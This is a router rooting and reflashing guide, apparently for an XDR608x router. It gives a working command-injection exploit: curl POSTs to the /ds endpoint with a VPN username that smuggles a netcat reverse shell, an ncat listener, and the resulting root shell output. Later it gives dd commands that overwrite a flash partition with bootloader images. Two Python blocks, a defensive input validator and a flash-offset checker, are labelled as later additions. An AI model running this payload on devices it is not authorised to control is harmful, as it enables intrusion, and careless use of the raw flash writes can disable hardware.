root method:
- Install nmap; we mainly need the ncat that ships with it.
- Open a terminal window and run
  ncat -nvlp 4444
  to start listening.
- Press F12 to open the browser's developer console and look for a URL of the form
  http://192.168.1.1/stok=<stok>/ds
  In Chrome, go to the "Network" tab, find the request whose "Name" is "ds", click it, then click "Headers" in the right-hand pane and you will see it.
- Next, if you are on Windows, do the following in a WSL terminal; on Linux or macOS you can work in the terminal directly.
- First store the stok in an environment variable
  export stok=
  then run the following command
  curl http://192.168.1.1/stok=${stok}/ds -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","name":"user_1","para":{"username":";mkfifo /tmp/p;sh -i&1|nc 192.168.1.254 4444 >/tmp/p&","password":"password","type":"l2tp","localip":"192.168.1.1","ippool":"ippool","dns":"1.1.1.1","netmode":"client2lan","maxsessions":"10","remotesubnet":"192.168.1.0/24","block":"0"}},"method":"add"}'
  If it runs successfully, it returns {"error_code":0}
  Continue by running the following command
  curl http://192.168.1.1/stok=${stok}/ds -H "Content-Type: application/json" -X POST -d '{"vpn":{"user_1":{"username":";mkfifo /tmp/p;sh -i&1|nc 192.168.1.254 4444 >/tmp/p&","password":"password","type":"l2tp","localip":"192.168.1.1","ippool":"ippool","dns":"1.1.1.1","netmode":"client2lan","maxsessions":"10","remotesubnet":"192.168.1.0/24","block":"1"}},"method":"set"}'
  If it runs successfully, it returns {"error_code":0}
At this point, in the terminal window you opened in step 2, you should see a prompt like the following:
sh: can't access tty; job control turned off
BusyBox v1.19.4 (2022-07-20 12:29:22 UTC) built-in shell (ash)
Enter 'help' for a list of built-in commands.
/ #
You now have a shell prompt with root privileges.
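The root shell above comes from the router's /ds handler passing the VPN "username" field to a shell unsanitized. The mitigation is to refuse such values before they reach any command or config file. The following Python is an added example written for this post, not code from the router firmware or from the original author; the allowlist pattern, the field names it checks and the two sample request bodies are all constructed assumptions for illustration. It validates "username" against a strict allowlist and flags any string field in a /ds body that carries shell metacharacters, which is also usable as a log-side detection over captured POST bodies.

```python
import json
import re

# Strict allowlist for a VPN account name (assumption for this example):
# letters, digits, '.', '_' and '-', 1..32 characters. Anything else,
# including ';', '|', '&', '<', '>', '$', backticks and newlines, is
# rejected before the value can reach a shell or a shell-parsed config.
SAFE_USERNAME = re.compile(r"^[A-Za-z0-9._-]{1,32}$")

# Characters that have meaning to a POSIX shell; used to flag any other
# string field that a back end might one day interpolate into a command.
SHELL_META = re.compile(r"[;|&`$<>\n\r]")


def is_safe_vpn_username(name):
    """True only if the value is a str matching the allowlist exactly."""
    return isinstance(name, str) and SAFE_USERNAME.fullmatch(name) is not None


def string_leaves(node, path=()):
    """Yield (path, value) for every string leaf of a decoded JSON body,
    so both the 'add' shape ({"para": {...}}) and the 'set' shape
    ({"user_1": {...}}) seen on this page are walked the same way."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from string_leaves(value, path + (str(key),))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from string_leaves(value, path + (str(index),))
    elif isinstance(node, str):
        yield "/".join(path), node


def check_ds_request(raw_body):
    """Return a list of reasons to reject one /ds POST body; empty means OK."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return ["body is not valid JSON"]
    reasons = []
    for path, value in string_leaves(body):
        if path.endswith("/username") and not is_safe_vpn_username(value):
            reasons.append(f"{path}: username rejected by allowlist: {value!r}")
        elif SHELL_META.search(value):
            reasons.append(f"{path}: shell metacharacters in {value!r}")
    return reasons


# Constructed sample bodies (not captured traffic): one ordinary L2TP user
# and one whose username smuggles a second command after ';'.
BENIGN = ('{"vpn":{"table":"user","name":"user_1","para":{"username":"alice",'
          '"password":"s3cret","type":"l2tp"}},"method":"add"}')
INJECTED = ('{"vpn":{"table":"user","name":"user_1","para":{"username":"alice;id",'
            '"password":"x","type":"l2tp"}},"method":"add"}')

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("injected", INJECTED)):
        print(label, "->", check_ds_request(body) or "accepted")
```

The allowlist is applied to the username field regardless of where it sits in the JSON, so a firmware that accepts both the "add" and "set" request shapes gets the same rule for both; the metacharacter scan on every other string field is deliberately broad so that a new field wired to a shell later does not silently reopen the hole.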
-----------------------------------------------------------------------------------------------------------
After getting root SSH on the stock firmware, first use WinSCP to upload the extracted files to /tmp on the router, then run the following commands:
cd /tmp
dd bs=131072 conv=sync of=/dev/mtdblock9 if=xdr608x-bl2.bin
dd bs=131072 conv=sync of=/dev/mtdblock9 seek=28 if=xdr608x-fip.bin
sync
After rebooting, hold reset to enter the U-Boot web interface at http://192.168.1.1, where you can flash either a sysupgrade-format or an official-format firmware image.
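The two dd commands above write bl2 at the start of /dev/mtdblock9 and the FIP image at block 28 (28 * 131072 bytes = 0x380000), and conv=sync pads the last partial block to a full 128 KiB. Before writing to the flash it is worth checking that the padded bl2 image does not reach the FIP offset and that both images fit the partition, because a mistake here leaves the router unbootable. The following Python is an added example for this post, not the author's or the firmware's code; the image sizes and the partition size it uses are constructed assumptions, and a real run would pass the sizes of the actual xdr608x-bl2.bin and xdr608x-fip.bin files.

```python
import os

BLOCK = 131072          # bs= used by the dd commands on this page (128 KiB)
FIP_SEEK_BLOCKS = 28    # seek= used for the FIP image: 28 * BLOCK = 0x380000


def padded_size(nbytes, block=BLOCK):
    """Bytes dd actually writes with conv=sync: input rounded up to a whole block."""
    return -(-nbytes // block) * block   # ceiling division without floats


def plan_flash(bl2_size, fip_size, mtd_size=None, block=BLOCK, fip_seek=FIP_SEEK_BLOCKS):
    """Work out where each image lands on the mtd device and list any problems.

    Returns {"bl2": (start, end), "fip": (start, end), "problems": [...]};
    an empty problem list means the two dd commands are safe to run with
    these sizes. mtd_size is optional because the page does not state the
    size of /dev/mtdblock9 (pass the real value from /proc/mtd if known)."""
    problems = []
    if bl2_size <= 0:
        problems.append("bl2 image is empty")
    if fip_size <= 0:
        problems.append("fip image is empty")
    bl2_end = padded_size(bl2_size, block)
    fip_start = fip_seek * block
    fip_end = fip_start + padded_size(fip_size, block)
    if bl2_end > fip_start:
        problems.append(f"bl2 pads to {bl2_end} bytes and overlaps the FIP offset 0x{fip_start:x}")
    if mtd_size is not None and fip_end > mtd_size:
        problems.append(f"fip ends at 0x{fip_end:x}, past the end of the device (0x{mtd_size:x})")
    return {"bl2": (0, bl2_end), "fip": (fip_start, fip_end), "problems": problems}


def plan_from_files(bl2_path, fip_path, mtd_size=None):
    """Same check driven by the sizes of the image files on disk."""
    return plan_flash(os.path.getsize(bl2_path), os.path.getsize(fip_path), mtd_size)


if __name__ == "__main__":
    # Constructed sizes for illustration: a 200 000-byte bl2 and a 1 MiB FIP.
    print(plan_flash(200_000, 1_048_576))
    # Constructed failure case: a bl2 image large enough to run into the FIP slot.
    print(plan_flash(4 * 1024 * 1024, 1_048_576)["problems"])
```

Run plan_from_files("xdr608x-bl2.bin", "xdr608x-fip.bin") on the extracted images and only proceed with the dd commands when "problems" comes back empty; the end offsets it prints are also the ranges to read back with dd after writing if you want to compare against the source files.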